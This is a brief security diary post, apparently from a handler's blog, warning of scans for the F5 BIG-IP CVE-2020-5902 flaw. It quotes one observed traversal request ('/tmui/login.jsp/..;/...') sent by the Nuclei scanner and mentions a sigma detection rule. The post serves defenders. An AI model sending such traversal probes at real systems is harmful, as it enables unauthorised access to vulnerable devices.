CVE-2020-5902 F5 BIG-IP Exploitation Attempt
A quick heads-up: we are seeing scans for F5 BIG-IP's vulnerability CVE-2020-5902.
They look like this (Host header redacted):
GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa HTTP/1.1
Host:x.x.x.x
User-Agent: Nuclei - Open-source project (github.com/projectdiscovery/nuclei)
Accept: */*
Accept-Language: en
Connection: close
Accept-Encoding: gzip
Here is a sigma rule for CVE-2020-5902.
Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com
×
Diary Archives
Comments
Anonymous
Jul 5th 2020
4 years ago